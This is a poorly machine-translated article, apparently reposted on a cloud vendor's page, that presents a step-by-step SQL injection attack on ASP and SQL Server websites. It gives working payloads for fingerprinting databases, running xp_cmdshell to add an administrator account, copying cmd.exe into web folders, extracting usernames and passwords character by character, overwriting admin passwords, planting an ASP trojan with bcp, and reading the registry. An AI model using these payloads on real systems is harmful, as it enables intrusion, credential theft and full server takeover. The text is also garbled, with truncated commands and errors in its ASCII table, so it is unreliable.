What is SQL injection attacks?

Source: Internet
Author: User
Tags bulk insert ranges

This article is an analysis and summary of a large number of similar articles on the internet, combined with your own experience in the implementation process, many of which are directly cited, do not pay attention to the source, please forgive me)
With the development of B/S application development, more and more programmers are writing applications using this mode. However, due to the varying levels and experience of programmers, a considerable number of programmers did not judge the legitimacy of user input data when writing code, posing a security risk to the application. You can submit a piece of database query code, Root
Obtain the expected data according to the results returned by the program. This is the so-called SQL Injection, that is, SQL Injection.
SQL injection is accessed from the normal WWW port, and it seems to be no different from the general Web page access, so the current Municipal firewall does not alert SQL injection, if the Administrator does not check IIS logs, it may be invisible for a long time. However, the SQL injection method is quite flexible, and many unexpected situations may occur during the injection process. Can you analyze the data according to the actual situation and construct clever SQL statements to obtain the desired data successfully.
According to statistics, ASP + Access or SQLServer accounts for more than 70% of websites, PHP + MySQ accounts for L20 %, and others do not. In this paper, SQL-SERVER + ASP examples to illustrate the principle, method and process of SQL injection. (The PHP injection article was written by another NB-consortium friend zwell)
The general idea of SQL injection attacks is:
L SQL Injection Location discovered;
L determine the background database type;
L determine the executable status of XP_CMDSHELL
L WEB virtual directory discovered
L upload ASP Trojans;
L obtain the Administrator permission;
I. Determination of SQL Injection Vulnerabilities
In general, SQL Injection generally exists in the form of HTTP: // xxx. xxx. xxx/abc. asp? In ASP dynamic web pages with parameters such as id = XX, sometimes a dynamic web page may have only one parameter, sometimes there may be N parameters, sometimes Integer Parameters, or sometimes string parameters, cannot be generalized. In short, as long as a dynamic webpage with parameters and the webpage accesses the database, there may be SQL injection. If ASP programmers do not have security awareness and do not filter necessary characters, there is a high possibility of SQL injection.
To fully understand the dynamic web page response information, adjust the IE configuration first. Remove the check box before IE menu-tool-Internet option-advanced-show friendly HTTP Error messages.
To clarify the problem, the following uses HTTP: // xxx. xxx. xxx/abc. asp? P = YY is used as an example for analysis. YY may be an integer or a string.
1. Integer parameter judgment
When the input parameter YY is an integer, the SQL statement in abc. asp is generally as follows:
Select * from table name where field = YY, so you can use the following steps to test whether SQL Injection exists.
① HTTP: // xxx. xxx. xxx/abc. asp? P = YY '(with a single quotation mark attached), the SQL statement in abc. ASP becomes
Select * from table name where field = YY ', abc. asp running exception;
② HTTP: // xxx. xxx. xxx/abc. asp? P = YY and 1 = 1, abc. asp is running normally, and it works properly with HTTP: // xxx. xxx. xxx/abc. asp? P = YY: The running result is the same;
③ HTTP: // xxx. xxx. xxx/abc. asp? P = YY and 1 = 2, abc. asp running exception;
If the preceding three steps are fully met, the SQL injection vulnerability exists in abc. asp.
2. Determination of string Parameters
When the input parameter YY is a string, the SQL statement in abc. asp is generally as follows:
Select * from table name where field = 'yy', so you can use the following steps to test whether SQL Injection exists.
① HTTP: // xxx. xxx. xxx/abc. asp? P = YY '(with a single quotation mark attached), the SQL statement in abc. ASP becomes
Select * from table name where field = YY ', abc. asp running exception;
② HTTP: // xxx. xxx. xxx/abc. asp? P = YY & nb... 39; 1' = '1', abc. asp runs normally, and it works with HTTP: // xxx. xxx. xxx/abc. asp? P = YY: The running result is the same;
③ HTTP: // xxx. xxx. xxx/abc. asp? P = YY & nb... 39; 1' = '2', abc. asp running exception;
If the preceding three steps are fully met, the SQL injection vulnerability exists in abc. asp.
3. Handling of Special Cases
Sometimes ASP programmers filter out single quotes and other characters to prevent SQL injection. You can try the following methods.
① Fixed-size mixing: Because VBS are not case sensitive, programmers usually either filter all uppercase strings or all lowercase strings during filtering, while case-sensitive mixing is often ignored. For example, replace SelecT and select with SELECT;
② UNICODE method: in IIS, UNICODE character sets are used for internationalization. We can convert the string entered in IE into a UNICODE string for input. For example, + = % 2B, Space = % 20, etc. For URLEncode information, see Appendix 1;
③ ASCII code method: You can replace all or part of the entered characters with ASCII code, such as U = chr (85) and a = chr (97, for ASCII information, see appendix 2;

Ii. differentiate Database Server types
In general, ACCESS and SQL-SERVER are the most commonly used database server, although they all support T-SQL standards, but there are differences, and different databases have different attack methods, must be treated differently.
1. Identify by using system variables of the Database Server
SQL-SERVER has user, db_name () and other system variables, using these system values not only can judge the SQL-SERVER, but also can get a lot of useful information. For example:
① HTTP: // xxx. xxx. xxx/abc. asp? P = YY and user> 0 not only can judge whether it is a SQL-SERVER, but also can get the user name currently connected to the database
② HTTP: // xxx. xxx. xxx/abc. asp? P = YY & n... db_name ()> 0 can not only judge whether it is a SQL-SERVER, but also get the name of the database currently in use;
2. Use System tables
The ACCESS system table is msysobjects, and has no ACCESS permission in the WEB environment, while the SQL-SERVER system table is sysobjects, has ACCESS permission in the WEB environment. For the following two statements:
① HTTP: // xxx. xxx. xxx/abc. asp? P = YY and (select count (*) from sysobjects)> 0
② HTTP: // xxx. xxx. xxx/abc. asp? P = YY and (select count (*) from msysobjects)> 0
If the database is a SQL-SERVE, the first, abc. asp must be running normally, the second is abnormal; if ACCESS is, both are abnormal.

3. MSSQL three key system tables
Sysdatabases system table: each database on Microsoft SQL Server occupies one row in the table. When you first Install SQL Server, sysdatabases contains the master, model, msdb, mssqlweb, and tempdb database items. The table is only stored in the master database. This table is saved in the master database. What information is saved in this table? This is very important. It stores all the database names, as well as the database IDs and related information.
Here I will list the useful field names and descriptions. Name // indicates the name of the database.
Dbid // indicates the database ID. dbid ranges from 1 to 5. These databases are master, model, MSDB, mssqlweb, and tempdb respectively. Select * from Master. DBO. sysdatabases to query all database names.

Sysobjects: each database in the SQL-SERVER has this system table, which stores all the objects created in the database, such as constraints, default values, logs, rules, stored procedures, etc, each object occupies one row in the table. The following table describes the field names and descriptions of the system table.
Name, ID, xtype, uid, status: Object Name, Object ID, object type, user ID of the owner object, and object status.
Object Type (xtype ). It can be one of the following object types:
C = check Constraints
D = default value or default Constraint
F = foreign key constraint
L = Log
Fn = scalar function
If = embedded table functions
P = Stored Procedure
PK = primary key constraint (type: K)
Rf = copy and filter the Stored Procedure
S = system table
TF = table functions
Tr = trigger
U = User table
Uq = unique constraint (type is K)
V = View
X = Extended Stored Procedure
When xtype = 'U' and status> 0 indicates that the table is created by the user, the object name is the table name, and the Object ID is the table id value.
Use: select * from ChouYFD. dbo. sysobjects where xtype = 'U' and status> 0 to list the table names created by all users in ChouYFD.

Syscolumns: each column in each table and view occupies one row in the table, and each parameter in the stored procedure occupies one row in the table. The table is located in each database. The main fields are:
Name, id, colid: The field name, table ID, and field id respectively. The ID is the id of the table we just obtained using sysobjects.
Select * from ChouYFD. dbo. syscolumns where id = 123456789.

Iii. Determine the executable status of XP_CMDSHELL
If the account that is currently connected to data has the SA permission and master. dbo. xp_mongoshell extends the Stored Procedure (you can directly use the shell of the operating system to call this Stored Procedure). The entire computer can be fully controlled using the following methods, and all subsequent steps can be saved.
1. HTTP: // xxx. xxx. xxx/abc. asp? P = YY & nb... er> 0 abc. asp: Execution exception. However, you can obtain the username of the currently connected database (if dbo is displayed, it indicates SA ).
2. HTTP: // xxx. xxx. xxx/abc. asp? P = YY... me ()> 0 abc. asp execution exception, but the name of the database currently connected can be obtained.
3. HTTP: // xxx. xxx. xxx/abc. asp? P = YY; exec master .. xp_cmdshell "net user aaa bbb/add" -- (the master is the primary database of the SQL-SERVER; the semicolon in the name indicates that the SQL-SERVER executes the statement name before the semicolon and continues executing the statement after it; "-" indicates that all the content after it is only annotated and the system does not execute it. You can directly add the operating system account aaa with the password bbb.
4. HTTP: // xxx. xxx. xxx/abc. asp? P = YY; exec master .. xp_mongoshell "net localgroup administrators aaa/add" -- add the newly added account aaa to the administrators group.
5. HTTP: // xxx. xxx. xxx/abc. asp? P = YY; backuup database name to disk = 'C:/inetpub/wwwroot/save. db' backs up all the data to the WEB directory and downloads the file over HTTP (of course, the WEB virtual directory is preferred ).
6. Create a UNICODE vulnerability by copying CMD
HTTP: // xxx. xxx. xxx/abc. asp? P = YY; exe... dbo. xp_mongoshell "copy c:/winnt/system32/cmd.exe c:/inetpub/scripts/cmd.exe" creates a UNICODE vulnerability by exploiting this vulnerability, this completes the control of the entire computer (of course, the first choice is to know the WEB virtual directory ).

4. Discover WEB virtual directories
Only the WEB virtual directory can be found to determine the location where the ASP Trojan is placed and obtain the USER permission. Two methods are effective.
First, based on experience, the WEB virtual directory is: c:/inetpub/wwwroot; D:/inetpub/wwwroot; E:/inetpub/wwwroot, the executable virtual directory is: c:/inetpub/scripts; D:/inetpub/scripts; E:/inetpub/scripts.
The second is to traverse the directory structure of the system, analyze the results and find the WEB virtual directory;
First create a temporary table: temp
HTTP: // xxx. xxx. xxx/abc. asp? P = YY; create & n... mp (id nvarchar (255), num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255 ));--
Next:
(1) We can use xp_availablemedia to obtain all the current drives and store them in the temp table:
HTTP: // xxx. xxx. xxx/abc. asp? P = YY; insert temp... ter. dbo. xp_availablemedia ;--
We can query the temp content to obtain the drive list and related information.
(2) We can use xp_subdirs to obtain the subdirectory list and store it in the temp table:
HTTP: // xxx. xxx. xxx/abc. asp? P = YY; insert into temp (I... dbo. xp_subdirs 'C :/';--
(3) We can also use xp_dirtree to obtain the directory tree structure of all subdirectories and import them to the temp table:
HTTP: // xxx. xxx. xxx/abc. asp? P = YY; insert into temp (id, num1) exec master. dbo. xp_dirtree 'C :/';--
In this way, you can successfully browse the list of all directories (folders:

To view the content of a file, run xp_cmdsell:
HTTP: // xxx. xxx. xxx/abc. asp? P = YY; insert into temp (id) exec... nbsp; 'Type c:/web/index. asp ';--
You can use the 'bulk insert' syntax to insert a text file into a temporary table. For example, bulk insert temp (id) from 'C:/inetpub/wwwroot/index. asp'
View temp to view the index. asp file! By analyzing various ASP files, you can obtain a large amount of system information, WEB construction and management information, and even the connection password of the SA account.

Of course, if xp_cmshell can be executed, we can use it to complete:
HTTP: // xxx. xxx. xxx/abc. asp? P = YY; insert into temp (id) & nbs... into shell 'dir c :/';--
HTTP: // xxx. xxx. xxx/abc. asp? P = YY; insert into temp (id) & n... p_using shell 'dir c:/*. asp/s/';--

Through xp_cmdshell, we can see all what we want to see, including W3svc
HTTP: // xxx. xxx. xxx/abc. asp? P = YY; insert into temp (id) exec master. dbo. xp_1_she... ub/AdminScripts/adsutil. vbs enum w3svc'

However, we can also use
HTTP: // xxx. xxx. xxx/abc. asp? P = YY; insert into temp (id, num1) exec master. dbo. xp_dirtree 'C :/';--

Note:
1. After each of the preceding items is viewed, all contents in TEMP should be deleted:
HTTP: // xxx. xxx. xxx/abc. asp? P = YY; delete from temp ;--
2. The TEMP table is browsed by: (Suppose TestDB is the name of the database currently connected)
HTTP: // xxx. xxx. xxx/abc. asp? P = YY and (select top &... nbsp; TestDB. dbo. temp)> 0 to get the value of the first record id field in the table TEMP, and compare it with the integer, obviously abc. asp is abnormal, but the value of the id field can be found in the exception. If the table name is xyz
HTTP: // xxx. xxx. xxx/abc. asp? P = YY and (select top 1 id from... ere id not in ('xyz')> 0 to get the value of the second record id field in the TEMP table.

5. upload an ASP Trojan
The so-called ASP Trojan is a piece of ASP code with special functions and put it under the Scripts of the WEB virtual directory. Remote customers can execute it through IE to obtain the USER permission of the system, implement initial control over the system. There are two effective methods for uploading ASP Trojans:
1. Use the WEB Remote Management Function
Many WEB sites provide remote management to facilitate maintenance. Many WEB sites have different access permissions for different users. In order to achieve the control of user permissions, there is a WEB page that requires the user name and password. Only after the correct value is entered can the next operation be performed to manage the WEB, such as uploading and downloading files, browsing directories, and modifying configurations.
Therefore, if you get the correct USER name and password, you can not only upload ASP Trojans, but sometimes even directly get the USER permission to browse the system, the complex operations of "discovering WEB virtual directories" in the previous step are ignored.
The username and password are generally stored in a table, and the problem is solved when the table is read. The following two effective methods are provided.
A. injection method:
Theoretically, the authentication webpage has the following types:
Select * from admin where username = 'xxx' and password = 'yyy' statement. If necessary character filtering is not performed before the sentence is officially run, it is easy to implement SQL injection.
For example, enter abc 'or 1 = 1 in the username text box -- enter 123 in the password box, and the SQL statement is changed:
Select * from admin where username = 'abc' or 1 = 1 and password = '000000' this statement can always be executed correctly regardless of the user name and password entered by the user. You can easily cheat the system, obtain a valid identity.
B. Guess the solution:
The basic idea is: to guess the names of all databases, guess the names of each table in the warehouse, analyze the table names that store the user name and password, and guess the names of each field in the table, guess the content of each record in the table.
L guess all database names
HTTP: // xxx. xxx. xxx/abc. asp? P = YY and (select count (*) from master. dbo. sysdatabases where name> 1 and dbid = 6) <> 0 because the value of dbid ranges from 1 to 5, it is used by the system. Therefore, the user must have created it from 6. In addition, we submitted name> 1 (the name field is a character-type field and the number will be wrong), abc. an asp exception occurs. The first database name can be obtained. Similarly, the DBID can be changed to, or respectively... All Database names can be obtained.
Assume that the database name is TestDB.

L guess the name of the user table in the database
Guess: This method is used to guess the table name based on personal experience. Generally, user, users, member, members, userlist, memberlist, userinfo, manager, admin, adminuser, systemuser, systemusers, sysuser, sysusers, sysaccounts, and systemaccounts. And Judge by statement
HTTP: // xxx. xxx. xxx/abc. asp? P = YY and (select count (*) from TestDB. dbo. Table Name)> 0 if the table name exists, abc. asp works normally; otherwise, an exception occurs. Wait until you guess the name of the system account table.
Read method: The SQL-SERVER has a table that stores the core information of the system sysobjects, all the tables, views and other information about a database is stored in this table, and this table can be accessed through the WEB.
When xtype = 'U' and status> 0 indicates the table created by the user, you can obtain the name of the user table by finding and analyzing the table and name created by each user, the basic implementation method is:
① HTTP: // xxx. xxx. xxx/abc. asp? P = YY and (select top 1 name from TestD... type = 'U' and status> 0)> 0 to get the name of the table created by the first user and compare it with an integer. asp is abnormal, but the table name can be found in the exception. If the table name is xyz
② HTTP: // xxx. xxx. xxx/abc. asp? P = YY and (select top 1 name from TestDB. dbo. sysobjects &... tatus> 0 and name not in ('xyz')> 0 to get the name of the table created by the second user. Similarly, you can get the names of all created tables.
According to the table name, the user name and password of the table are generally determined. The following assumes that the table is named Admin.
L name of the username field and password field
The admin table must have a username field and a password field. Only the names of these two fields can be obtained. There are two ways to get their names.
This method is used to guess the field name based on personal experience. Generally, the username field is commonly used: username, name, user, account, etc. The names of password fields are commonly used: password, pass, pwd, passwd, etc. And Judge by statement
HTTP: // xxx. xxx. xxx/abc. asp? P = YY and (select count (field name) from TestDB. dbo. admin)> 0 "select count (field name) from table name" statement to obtain the number of rows in the Table. Therefore, if the field name exists, abc. asp works normally. Otherwise, an exception occurs. This loop continues until the names of the two fields are guessed.
Read method: the basic implementation method is
HTTP: // xxx. xxx. xxx/abc. asp? P = YY and (select... me (object_id ('admin'), 1) from TestDB. dbo. sysobjects)> 0. Select top 1 col_name (object_id ('admin'), 1) from TestDB. dbo. sysobjects is the first field name for obtaining a known table name from sysobjects. When compared with an integer, it is clear that abc. asp is abnormal, but the field name can be found in the exception. Replace 1 in col_name (object_id ('admin'), 1 with 2, 3, 4, 5, 6... You can obtain the names of all fields.
L guess the username and password
The most common and effective methods to guess the user name and password are:
ASCII code verbatim decoding method: although this method is slow, it is certainly feasible. The basic idea is to first guess the length of the field and then guess the value of each bit in sequence. The method of user name guessing is the same as that of password guessing. The following uses the user name guessing as an example to describe the process.
HTTP: // xxx. xxx. xxx/abc. asp? P = YY and (select top & n... nbsp; from TestDB. dbo. admin) = X (X = 1, 2, 3, 4, 5 ,... N, username is the name of the username field, and admin is the table name). If x is a value of I and abc. asp is running normally, I is the length of the first username. For example, when you enter
HTTP: // xxx. xxx. xxx/abc. asp? P = YY and (select top... e) from TestDB. dbo. admin) = 8 When abc. asp runs normally, the length of the first user name is 8
HTTP: // xxx. xxx. xxx/abc. asp? P = YY and (sel... ascii (substring (username, m, 1) from TestDB. dbo. admin) = n (m value ranges from 1 to the length of the username obtained in the previous step. When m is 1, 2, 3 ,... Guess the number 1, 2, 3 ,... Bit value; n value is 1 ~ 9. ~ Z, ~ ASCII value of Z, that is, 1 ~ Any value between 128; admin is the name of the System user account table), if n is a value of I and abc. when asp is running normally, the ASCII code corresponding to I is the value of a user name. For example, when you enter
HTTP: // xxx. xxx. xxx/abc. asp? P = YY and (sel... ascii (substring (username, 3, 1) from TestDB. dbo. admin) = 80 abc. if asp runs normally, the third digit of the user name is P (ASCII of P is 80 );
HTTP: // xxx. xxx. xxx/abc. asp? P = YY and (sel... ascii (substring (username, 9, 1) from TestDB. dbo. admin) = 33 abc. if asp runs normally, the 9th-bit user name is! (! ASCII is 80 );
After you have guessed the first user name and password, you can guess all other user names and passwords. Note: Sometimes the obtained password may be the Information encrypted by MD5 or other methods, and you also need to use a dedicated tool for password removal. You can also change the password before using it. See the following description.
Simple Method: Use the user name to guess
HTTP: // xxx. xxx. xxx/abc. asp? P = YY and (select top 1... o. admin where username> 1). flag is a field in the admin table, and username is the username field. In this case, abc. asp is abnormal, but the Username value can be obtained. In the same way as above, you can get the second user name, the third user, and so on until all the user names in the table.
Guess the User Password: HTTP: // xxx. xxx. xxx/abc. asp? P = YY and (select top 1 & nb... b. dbo. admin where pwd> 1). flag is a field in the admin table, and pwd is a password field. In this case, abc. asp is abnormal, but the value of pwd can be obtained. In the same way, you can obtain the password of the second user name, the password of the third user, and so on until the password of all users in the table. The password is sometimes encrypted by MD5 and can be changed.
HTTP: // xxx. xxx. xxx/abc. asp? P = YY; update TestDB. dbo. admin set pwd = '... where username = 'www '; -- (the MD5 value of 1 is AAABBBCCCDDDEEEF, that is, change the password to 1; www is a known user name)
You can change the password to the original value in the same way.

2. Use the table content to import files
SQL has the BCP command, which can export the table content into a text file and place it in a specified location. With this function, we can first create a temporary table, then input an ASP trojan in one row in the table, and then use the BCP command to export and form an ASP file.
The command line format is as follows:
Bcp "select * from text .. foo "queryout c:/inetpub/wwwroot/runcommand. asp-c-S localhost-U sa-P foobar (the 's' parameter is the server for query execution, the 'U' parameter is the user name, And the 'p' parameter is the password, finally, a runcommand is uploaded. asp Trojans)

6. Obtain system administrator privileges
ASP Trojans only have the USER permission. To gain full control over the system, you must have the system administrator permission. What should I do? There are many methods to improve permissions:
Upload the trojan and modify the. ini file that runs automatically upon startup (it will die upon restart );
Copy cmd.exe to scripts to create a UNICODE vulnerability;
Download the SAM file, crack and obtain all the OS user names and passwords;
Wait, depending on the specific circumstances of the system, you can adopt different methods.

7. Several special means of SQL-SERVER
1. Use xp_regread to extend the stored procedure to modify the Registry
[Xp_regread] Another useful internal stored procedure is a collection of functions of the xp_regXXXX class (values, Xp_regdeletekey, Xp_regdeletevalue, values, Xp_regenumvalues, Xp_regread, expires, Xp_regwrite ). Attackers can use these functions to modify the registry, such as reading the SAM value, allowing empty connections, and automatically running programs at startup. For example:
Exec xp_regread HKEY_LOCAL_MACHINE, 'System/CurrentControlSet/Services/lanmanserver/parameters ', 'nullsessionshares' determine what session connections are available on the server.
Exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'System/CurrentControlSet/Services/snmp/parameters/validcommunities 'displays all SNMP group configurations on the server, attackers may reconfigure network devices in the same network.
2. Use other stored procedures to change the server
Xp_servicecontrol allows users to start and stop services. For example:
(Exec master .. xp_servicecontrol 'start', 'schedule'
Exec master .. xp_servicecontrol 'start', 'server ')
Xp_availablemedia displays the drive that is useful on the machine
Xp_dirtree allows a directory tree
Xp_enumdsn list ODBC data sources on the server
Xp_loginconfig
Xp_makecab allows you to create a compressed file on the server
Xp_ntsec_enumdomains lists the domains that the server can access.
Xp_terminate_process provides the process ID to terminate the process.

Appendix 1: URLUnicode table (excerpt, mainly non-letter characters, RFC1738)
Meaning of special characters URL Encoding
# Used to mark the specific document LOCATION % 23
% Encode special characters % 25
& Separate different variable value pairs % 26
+ Space % 2B in the variable value
/Indicates the directory path % 2F
/% 5C
= Used to connect keys and values % 3D
? Start % 3F of the query string
Space % 20
. Period % 2E
: Colon % 3A

Appendix 2: ASCII table (excerpt)
Dec Hex Char
80 50 P
32 20 (space) 81 51 Q
33 21! 82 52 R
34 22 "83 53 S
35 23 #84 54 T
36 24 $ Content $ nbsp; 85 55 U
37 25% 86 56 V
38 26 & 87 57 W
39 27 '88 58 X
40 28 (89 59 Y
41 29) 90 5A Z
42 2A * 91 5B [
43 2B + 92 5C/
44 2C, 93 5D]
45 2D-94 5E ^
46 2E. 95 5F _
47 2F/96 60'
48 30 0 97 61
49 31 1 98 62 B
50 32 2 99 63 c
51 33 3 100 64 d
52 34 4
53 35 5 101 65 e
54 36 6 102 66 f
55 37 7 103 67g
56 38, 8, 104, 68 h
57 39 9 105 69 I
58 3A: 106 6A j
59 3B; 107 6B k
60 3C <108 6C l
61 3D = 109 6D m
62 3E> 110 6E n
63 3F? 111 6F o
112 70 p
64 40 @ 113 72 q
65 41 A 114 72 r
66 42 B 115 73 s
67 43 C 116 74 t
68 44 D 117 75 u
69 45 E 118 76 v
70 46 F 119 77 w
71 47G 120 78 x
72 48 H 121 79 y
73, 49, I 122, 7A, z
74 4A J 123 7B {
75 4B K 124 7C |
76 4C L 125 7D}
77 4D M 126 7E ~
78 4E N 127 7F €
79 4F O 128 80 €
Http://blog.csdn.net/lee576/archive/2007/01/25/1493587.aspx

Previous Article: js asp c # preventing SQL Injection popularity: 3386
Next: use the default password of the ORACLE system account to increase the permission popularity: 2880
Click here to browse allSQL InjectionContent

 

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.